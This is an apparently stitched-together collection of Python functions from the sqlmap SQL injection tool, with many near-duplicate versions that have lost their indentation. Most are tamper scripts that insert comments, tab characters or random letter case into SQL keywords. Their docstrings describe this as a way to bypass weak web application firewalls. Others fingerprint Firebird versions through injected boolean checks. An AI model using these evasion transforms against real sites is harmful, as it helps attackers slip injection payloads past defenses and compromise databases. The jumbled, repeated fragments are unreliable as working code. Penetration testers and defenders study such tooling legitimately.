def tamper(payload, **kwargs):
"""
Add random inline comments inside SQL keywords (e.g. SELECT -> S/**/E/**/LECT)
>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
'I/**/NS/**/ERT'
"""
retVal = payload
if payload:
for match in re.finditer(r"\b[A-Za-z_]+\b", payload):
word = match.group()
if len(word) < 2:
continue
if word.upper() in kb.keywords:
_ = word[0]
for i in xrange(1, len(word) - 1):
_ += "%s%s" % ("/**/" if randomRange(0, 1) else "",
word[i])
_ += word[-1]
if "/**/" not in _:
index = randomRange(1, len(word) - 1)
_ = word[:index] + "/**/" + word[index:]
retVal = retVal.replace(word, _)
return retVal
def _sysTablesCheck(self):
retVal = None
table = (
("1.0", ("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)", )),
("1.5", ("NULLIF(%d,%d) IS NULL",
"EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)")),
("2.0", ("EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)",
"BIT_LENGTH(%d)>0", "CHAR_LENGTH(%d)>0")),
("2.1", ("BIN_XOR(%d,%d)=0", "PI()>0.%d", "RAND()<1.%d",
"FLOOR(1.%d)>=0")),
# TODO: add test for Firebird 2.5
)
for i in xrange(len(table)):
version, checks = table[i]
failed = False
check = checks[randomRange(0,
len(checks) - 1)].replace(
"%d",
getUnicode(randomRange(1, 100)))
result = inject.checkBooleanExpression(check)
if result:
retVal = version
else:
failed = True
break
if failed:
break
return retVal
def _sysTablesCheck(self):
retVal = None
table = (
("1.0", ("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)",)),
("1.5", ("NULLIF(%d,%d) IS NULL", "EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)")),
("2.0", ("EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "BIT_LENGTH(%d)>0", "CHAR_LENGTH(%d)>0")),
("2.1", ("BIN_XOR(%d,%d)=0", "PI()>0.%d", "RAND()<1.%d", "FLOOR(1.%d)>=0")),
# TODO: add test for Firebird 2.5
)
for i in xrange(len(table)):
version, checks = table[i]
failed = False
check = checks[randomRange(0, len(checks) - 1)].replace("%d", getUnicode(randomRange(1, 100)))
result = inject.checkBooleanExpression(check)
if result:
retVal = version
else:
failed = True
break
if failed:
break
return retVal
def tamper(payload, **kwargs):
"""
Add random comments to SQL keywords
>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
'I/**/N/**/SERT'
"""
retVal = payload
if payload:
for match in re.finditer(r"\b[A-Za-z_]+\b", payload):
word = match.group()
if len(word) < 2:
continue
if word.upper() in kb.keywords:
_ = word[0]
for i in xrange(1, len(word) - 1):
_ += "%s%s" % ("/**/" if randomRange(0, 1) else "", word[i])
_ += word[-1]
if "/**/" not in _:
index = randomRange(1, len(word) - 1)
_ = word[:index] + "/**/" + word[index:]
retVal = retVal.replace(word, _)
return retVal
def tamper(payload, **kwargs):
"""
Add any string to SQL keywords
Change userDefine that you want to insert
When OR in FOR or FLOOR ,will insert OR between O and R
>>> import random
>>> userDefine = r"/**/"
>>> random.seed(0)
>>> tamper('FLOOR')
'FLOO/**/R'
Insert userDefine to sql keywords
>>> import random
>>> userDefine = r"%09"
>>> random.seed(0)
>>> tamper('INSERT')
'I%09N%09SERT'
"""
userDefine = r"%09" # Change userDefine that you want to insert
kws = ["table", "or"]
retVal = payload
if payload:
for match in re.finditer(r"\b[A-Za-z_]+\b", payload):
word = match.group()
if len(word) < 2:
continue
if word.upper() in kb.keywords:
_ = word[0]
for i in xrange(1, len(word) - 1):
_ += "%s%s" % (userDefine if randomRange(0, 1) else "",
word[i])
_ += word[-1]
if userDefine not in _:
index = randomRange(1, len(word) - 1)
_ = word[:index] + userDefine + word[index:]
retVal = retVal.replace(word, _)
for x in kws:
if x in retVal:
retVal = retVal.replace(x, x[:-1] + userDefine + x[-1:])
return retVal
def __setHTTPUserAgent():
"""
Set the HTTP User-Agent header.
Depending on the user options it can be:
* The default sqlmap string
* A default value read as user option
* A random value read from a list of User-Agent headers from a
file choosed as user option
"""
if conf.agent:
debugMsg = "setting the HTTP User-Agent header"
logger.debug(debugMsg)
conf.httpHeaders.append(("User-Agent", conf.agent))
return
if not conf.userAgentsFile:
addDefaultUserAgent = True
for header, _ in conf.httpHeaders:
if header == "User-Agent":
addDefaultUserAgent = False
break
if addDefaultUserAgent:
conf.httpHeaders.append(("User-Agent", __defaultHTTPUserAgent()))
return
if not kb.userAgents:
debugMsg = "loading random HTTP User-Agent header(s) from "
debugMsg += "file '%s'" % conf.userAgentsFile
logger.debug(debugMsg)
try:
kb.userAgents = getFileItems(conf.userAgentsFile)
except IOError:
warnMsg = "unable to read HTTP User-Agent header "
warnMsg += "file '%s'" % conf.userAgentsFile
logger.warn(warnMsg)
conf.httpHeaders.append(("User-Agent", __defaultHTTPUserAgent()))
return
__count = len(kb.userAgents)
if __count == 1:
__userAgent = kb.userAgents[0]
else:
__userAgent = kb.userAgents[randomRange(stop=__count-1)]
__userAgent = sanitizeStr(__userAgent)
conf.httpHeaders.append(("User-Agent", __userAgent))
logMsg = "fetched random HTTP User-Agent header from "
logMsg += "file '%s': %s" % (conf.userAgentsFile, __userAgent)
logger.info(logMsg)
def tamper(payload):
"""
Replaces each keyword character with random case value
Example:
* Input: INSERT
* Output: InsERt
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressions
* This tamper script should work against all (?) databases
"""
retVal = payload
if payload:
for match in re.finditer(r"[A-Za-z_]+", retVal):
word = match.group()
if word.upper() in kb.keywords:
newWord = str()
for i in xrange(len(word)):
newWord += word[i].upper() if randomRange(0, 1) else word[i].lower()
retVal = retVal.replace(word, newWord)
return retVal
def tamper(payload):
"""
Add random comments to SQL keywords
Example: 'INSERT' becomes 'IN/**/S/**/ERT'
"""
retVal = payload
if payload:
for match in re.finditer(r"[A-Za-z_]+", payload):
word = match.group()
if len(word) < 2:
continue
if word.upper() in kb.keywords:
newWord = word[0]
for i in xrange(1, len(word) - 1):
newWord += "%s%s" % ("/**/" if randomRange(0, 1) else "", word[i])
newWord += word[-1]
retVal = retVal.replace(word, newWord)
return retVal
def _selectPort(self):
for connType, connStr in self._portData.items():
if self.connectionStr.startswith(connType):
return self._skeletonSelection(connStr,
maxValue=65535,
default=randomRange(
1025, 65535))
def tamper(payload, **kwargs):
"""
Add random comments to SQL keywords
>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
'I/**/N/**/SERT'
"""
retVal = payload
if payload:
for match in re.finditer(r"[A-Za-z_]+", payload):
word = match.group()
if len(word) < 2:
continue
if word.upper() in kb.keywords:
_ = word[0]
for i in xrange(1, len(word) - 1):
_ += "%s%s" % ("/**/" if randomRange(0, 1) else "",
word[i])
_ += word[-1]
retVal = retVal.replace(word, _)
return retVal
def tamper(payload, headers):
"""
Add random comments to SQL keywords
Example: 'INSERT' becomes 'IN/**/S/**/ERT'
"""
retVal = payload
if payload:
for match in re.finditer(r"[A-Za-z_]+", payload):
word = match.group()
if len(word) < 2:
continue
if word.upper() in kb.keywords:
_ = word[0]
for i in xrange(1, len(word) - 1):
_ += "%s%s" % ("/**/" if randomRange(0, 1) else "",
word[i])
_ += word[-1]
retVal = retVal.replace(word, _)
return retVal, headers
def tamper(payload, **kwargs):
retVal = payload
if payload:
for match in re.finditer(r"\b[A-Za-z_]+\b", payload):
word = match.group()
if len(word) < 2:
continue
if word.upper() in kb.keywords:
_ = word[0]
for i in xrange(1, len(word) - 1):
_ += "%s%s" % ("/**/" if randomRange(0, 1) else "", word[i])
_ += word[-1]
if "/**/" not in _:
index = randomRange(1, len(word) - 1)
_ = word[:index] + "/**/" + word[index:]
retVal = retVal.replace(word, _)
if payload:
for match in re.finditer(r"[A-Za-z_]+", retVal):
word = match.group()
if word.upper() in kb.keywords:
while True:
_ = ""
for i in xrange(len(word)):
_ += word[i].upper() if randomRange(0, 1) else word[i].lower()
if len(_) > 1 and _ not in (_.lower(), _.upper()):
break
retVal = retVal.replace(word, _)
if payload:
retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)
return retVal
def tamper(payload, **kwargs):
"""
Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
* SQLite 3
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressions
* This tamper script should work against all (?) databases
>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
'InSeRt'
>>> tamper('f()')
'f()'
>>> tamper('function()')
'FuNcTiOn()'
>>> tamper('SELECT id FROM `user`')
'SeLeCt id FrOm `user`'
"""
retVal = payload
if payload:
for match in re.finditer(r"\b[A-Za-z_]{2,}\b", retVal):
word = match.group()
if (word.upper() in kb.keywords
and re.search(r"(?i)[`\"'\[]%s[`\"'\]]" % word, retVal) is
None) or ("%s(" % word) in payload:
while True:
_ = ""
for i in xrange(len(word)):
_ += word[i].upper() if randomRange(
0, 1) else word[i].lower()
if len(_) > 1 and _ not in (_.lower(), _.upper()):
break
retVal = retVal.replace(word, _)
return retVal
def _sysTablesCheck(self):
retVal = None
table = (
("1.0", ("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)", )),
("1.5", ("NULLIF(%d,%d) IS NULL",
"EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)")),
("2.0", ("EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)",
"BIT_LENGTH(%d)>0", "CHAR_LENGTH(%d)>0")),
("2.1", ("BIN_XOR(%d,%d)=0", "PI()>0.%d", "RAND()<1.%d",
"FLOOR(1.%d)>=0")),
(
"2.5", ("'%s' SIMILAR TO '%s'", )
), # Reference: https://firebirdsql.org/refdocs/langrefupd25-similar-to.html
(
"3.0", ("FALSE IS FALSE", )
), # https://www.firebirdsql.org/file/community/conference-2014/pdf/02_fb.2014.whatsnew.30.en.pdf
)
for i in xrange(len(table)):
version, checks = table[i]
failed = False
check = checks[randomRange(
0,
len(checks) - 1)].replace("%d", getUnicode(randomRange(
1, 100))).replace("%s", getUnicode(randomStr()))
result = inject.checkBooleanExpression(check)
if result:
retVal = version
else:
failed = True
break
if failed:
break
return retVal
def __sysTablesCheck(self):
retVal = None
table = (
("1.0", ["AND EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)"]),
("1.5", ["AND NULLIF(%d,%d) IS NULL", "AND EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)"]),
("2.0", ["AND EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "AND BIT_LENGTH(%d)>0", "AND CHAR_LENGTH(%d)>0"]),
("2.1", ["AND BIN_XOR(%d,%d)=0", "AND PI()>0.%d", "AND RAND()<1.%d", "AND FLOOR(1.%d)>=0"])
)
for i in xrange(len(table)):
version, checks = table[i]
failed = False
check = checks[randomRange(0,len(checks)-1)].replace("%d", getUnicode(randomRange(1,100)))
payload = agent.fullPayload(check)
result = Request.queryPage(payload)
if result:
retVal = version
else:
failed = True
break
if failed:
break
return retVal
def tamper(payload, **kwargs):
"""
Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
* SQLite 3
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressions
* This tamper script should work against all (?) databases
>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
'INseRt'
"""
retVal = payload
if payload:
for match in re.finditer(r"\b[A-Za-z_]+\b", retVal):
word = match.group()
if word.upper() in kb.keywords or ("%s(" % word) in payload:
while True:
_ = ""
for i in xrange(len(word)):
_ += word[i].upper() if randomRange(0, 1) else word[i].lower()
if len(_) > 1 and _ not in (_.lower(), _.upper()):
break
retVal = retVal.replace(word, _)
return retVal
def tamper(payload, **kwargs):
"""
Replaces each keyword character with random case value
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressions
* This tamper script should work against all (?) databases
>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
'INseRt'
"""
retVal = payload
if payload:
for match in re.finditer(r"\b[A-Za-z_]+\b", retVal):
word = match.group()
if word.upper() in kb.keywords:
while True:
_ = ""
for i in range(len(word)):
_ += word[i].upper() if randomRange(
0, 1) else word[i].lower()
if len(_) > 1 and _ not in (_.lower(), _.upper()):
break
retVal = retVal.replace(word, _)
return retVal
def tamper(payload):
"""
Replaces each character with random case value
Example: 'INSERT' might become 'InsERt'
"""
retVal = payload
if payload:
for match in re.finditer(r"[A-Za-z_]+", retVal):
word = match.group()
if word.upper() in kb.keywords:
newWord = str()
for i in xrange(len(word)):
newWord += word[i].upper() if randomRange(0, 1) else word[i].lower()
retVal = retVal.replace(word, newWord)
return retVal
def tamper(payload):
"""
Replaces each character with random case value
Example: 'INSERT' might become 'InsERt'
"""
retVal = payload
if payload:
for match in re.finditer(r"[A-Za-z_]+", retVal):
word = match.group()
if word.upper() in kb.keywords:
newWord = str()
for i in xrange(len(word)):
newWord += word[i].upper() if randomRange(
0, 1) else word[i].lower()
retVal = retVal.replace(word, newWord)
return retVal
def tamper(payload, headers=None):
"""
Replaces each keyword character with random case value
Example:
* Input: INSERT
* Output: InsERt
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressions
* This tamper script should work against all (?) databases
"""
retVal = payload
if payload:
for match in re.finditer(r"[A-Za-z_]+", retVal):
word = match.group()
if word.upper() in kb.keywords:
_ = str()
for i in xrange(len(word)):
_ += word[i].upper() if randomRange(
0, 1) else word[i].lower()
retVal = retVal.replace(word, _)
return retVal
def __setHTTPUserAgent():
"""
Set the HTTP User-Agent header.
Depending on the user options it can be:
* The default sqlmap string
* A default value read as user option
* A random value read from a list of User-Agent headers from a
file choosed as user option
"""
if conf.agent:
debugMsg = "setting the HTTP User-Agent header"
logger.debug(debugMsg)
conf.httpHeaders.append(("User-Agent", conf.agent))
return
if not conf.userAgentsFile:
conf.httpHeaders.append(("User-Agent", __defaultHTTPUserAgent()))
return
debugMsg = "fetching random HTTP User-Agent header from "
debugMsg += "file '%s'" % conf.userAgentsFile
logger.debug(debugMsg)
try:
fd = open(conf.userAgentsFile, "r")
except IOError:
warnMsg = "unable to read HTTP User-Agent header "
warnMsg += "file '%s'" % conf.userAgentsFile
logger.warn(warnMsg)
conf.httpHeaders.append(("User-Agent", __defaultHTTPUserAgent()))
return
__count = 0
__userAgents = []
while True:
line = fd.readline()
if not line:
break
__userAgents.append(line)
__count += 1
fd.close()
if __count == 1:
__userAgent = __userAgents[0]
else:
__userAgent = __userAgents[randomRange(stop=__count)]
__userAgent = sanitizeStr(__userAgent)
conf.httpHeaders.append(("User-Agent", __userAgent))
logMsg = "fetched random HTTP User-Agent header from "
logMsg += "file '%s': %s" % (conf.userAgentsFile, __userAgent)
logger.info(logMsg)
def __setHTTPUserAgent():
"""
Set the HTTP User-Agent header.
Depending on the user options it can be:
* The default sqlmap string
* A default value read as user option
* A random value read from a list of User-Agent headers from a
file choosed as user option
"""
if conf.agent:
debugMsg = "setting the HTTP User-Agent header"
logger.debug(debugMsg)
conf.httpHeaders.append(("User-Agent", conf.agent))
return
if not conf.userAgentsFile:
conf.httpHeaders.append(("User-Agent", __defaultHTTPUserAgent()))
return
debugMsg = "fetching random HTTP User-Agent header from "
debugMsg += "file '%s'" % conf.userAgentsFile
logger.debug(debugMsg)
try:
fd = open(conf.userAgentsFile, "r")
except IOError:
warnMsg = "unable to read HTTP User-Agent header "
warnMsg += "file '%s'" % conf.userAgentsFile
logger.warn(warnMsg)
conf.httpHeaders.append(("User-Agent", __defaultHTTPUserAgent()))
return
__count = 0
__userAgents = []
while True:
line = fd.readline()
if not line:
break
__userAgents.append(line)
__count += 1
fd.close()
if __count == 1:
__userAgent = __userAgents[0]
else:
__userAgent = __userAgents[randomRange(stop=__count)]
__userAgent = sanitizeStr(__userAgent)
conf.httpHeaders.append(("User-Agent", __userAgent))
logMsg = "fetched random HTTP User-Agent header from "
logMsg += "file '%s': %s" % (conf.userAgentsFile, __userAgent)
logger.info(logMsg)
def _selectPort(self):
for connType, connStr in self._portData.items():
if self.connectionStr.startswith(connType):
return self._skeletonSelection(connStr, maxValue=65535, default=randomRange(1025, 65535))
